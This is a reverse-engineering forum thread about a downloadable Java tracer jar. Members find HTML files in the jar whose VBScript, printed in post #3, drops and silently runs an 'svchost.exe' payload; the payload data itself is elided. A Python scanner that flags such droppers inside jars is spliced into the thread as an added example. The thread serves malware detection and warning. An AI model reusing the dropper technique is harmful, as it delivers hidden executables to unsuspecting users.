#1
Tracer v2
Java tracer, this time as a standalone jar. Just select a jar and an output text file, click Trace, and well, that's it! Classes which start with "java." can't be logged!
Download link: http://www18.zippyshare.com/v/qhcVnrK0/file.html
Last edited by CodeCracker; 01-17-2018 at 05:03.
The Following 2 Users Say Thank You to CodeCracker For This Useful Post:
niculaita (01-09-2018), wilson bibe (01-10-2018)
#2
This file contains a VIRUS !!!
No, it's no false positive. There are at least seven HTML files "package.html" inside which contain JavaScript to drop a file called "svchost.exe"
#3
Yep actually looks pretty dodgy, seems to try and use vbscript to drop svchost.exe
```vbscript
--<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = ......
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
        FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    Next
    FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
</SCRIPT>
```
Haven't actually checked out the file that is to be dropped yet.
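A defender-side check for what posts #2 and #3 describe, as an added example that is not part of the thread or of the Tracer tool: it lists HTML entries inside a jar whose script blocks combine the file-write and run calls seen in the quoted script, without extracting or executing anything. The marker names, the `min_hits` threshold and the sample archive are assumptions constructed for illustration.

```python
import io
import re
import zipfile

# Markers taken from the script quoted in this thread: a script block that
# writes a file through FileSystemObject and then runs it with WScript.Shell.
SCRIPT_RE = re.compile(rb"<script\b[^>]*>(.*?)</script>", re.I | re.S)
MARKERS = {
    "filesystemobject": re.compile(rb"Scripting\.FileSystemObject", re.I),
    "createtextfile": re.compile(rb"\.CreateTextFile\s*\(", re.I),
    "wscript_shell": re.compile(rb"WScript\.Shell", re.I),
    "run": re.compile(rb"\.Run\b", re.I),
    "hex_decode_loop": re.compile(rb'Chr\s*\(\s*CLng\s*\(\s*"&H"', re.I),
}
HTML_EXT = (".html", ".htm", ".hta")


def scan_jar(jar, min_hits=3):
    """Map each suspicious HTML entry to its sorted marker names.

    `jar` is a path or binary file object; entries are only read into memory.
    """
    findings = {}
    with zipfile.ZipFile(jar) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(HTML_EXT):
                continue
            hits = set()
            for body in SCRIPT_RE.findall(zf.read(info)):
                hits.update(n for n, rx in MARKERS.items() if rx.search(body))
            if len(hits) >= min_hits:
                findings[info.filename] = sorted(hits)
    return findings


def build_sample_jar():
    """Constructed archive: one clean and one flagged package.html (inert)."""
    flagged = (b'<html><SCRIPT Language=VBScript><!--\n'
               b'Set FSO = CreateObject("Scripting.FileSystemObject")\n'
               b'Set FileObj = FSO.CreateTextFile(DropPath, True)\n'
               b'Set WSHshell = CreateObject("WScript.Shell")\n'
               b'WSHshell.Run DropPath, 0\n</SCRIPT></html>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("com/example/package.html", b"<html>API docs</html>")
        zf.writestr("com/example/util/package.html", flagged)
        zf.writestr("com/example/Main.class", b"\xca\xfe\xba\xbe")
    buf.seek(0)
    return buf
```

Calling `scan_jar("some.jar")` on a downloaded archive before running it returns an empty dict when no HTML entry reaches the threshold.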
#4
I could read the same report at another forum, and CodeCracker replied saying that it is a false positive. But... I still have my doubts
#5
False positive due to some htmls present under jar archive.
If you already ran the jar file, don't be alarmed, since the htmls are not executed, and not even used.
Htmls removed, check: http://www18.zippyshare.com/v/qhcVnrK0/file.html
#6
so who and why the hell added malware html into your archives?
#7
Please, read the definition before stating something obviously wrong:
Quote:
Or would you call the ebolavirus "false positive" just because it's contained inside a glass phial?
The Following User Says Thank You to Kerlingen For This Useful Post:
Mkz (08-03-2018)
#8
@CodeCracker can this be used for a jar file that is launched with an EXE file?
#9
It can trace only jars
Quote:
You could try JavaClassManager https://forum.exetools.com/showthread.php?t=18592 to try to save loaded classes. JavaClassManager can launch both jar and exe extensions, it is just a matter of intercepting class loading and editing classes to do what you want.
The Following User Says Thank You to CodeCracker For This Useful Post:
niculaita (07-17-2018)
#10
Thanks for the guidance bro. I will try your recommendation
peace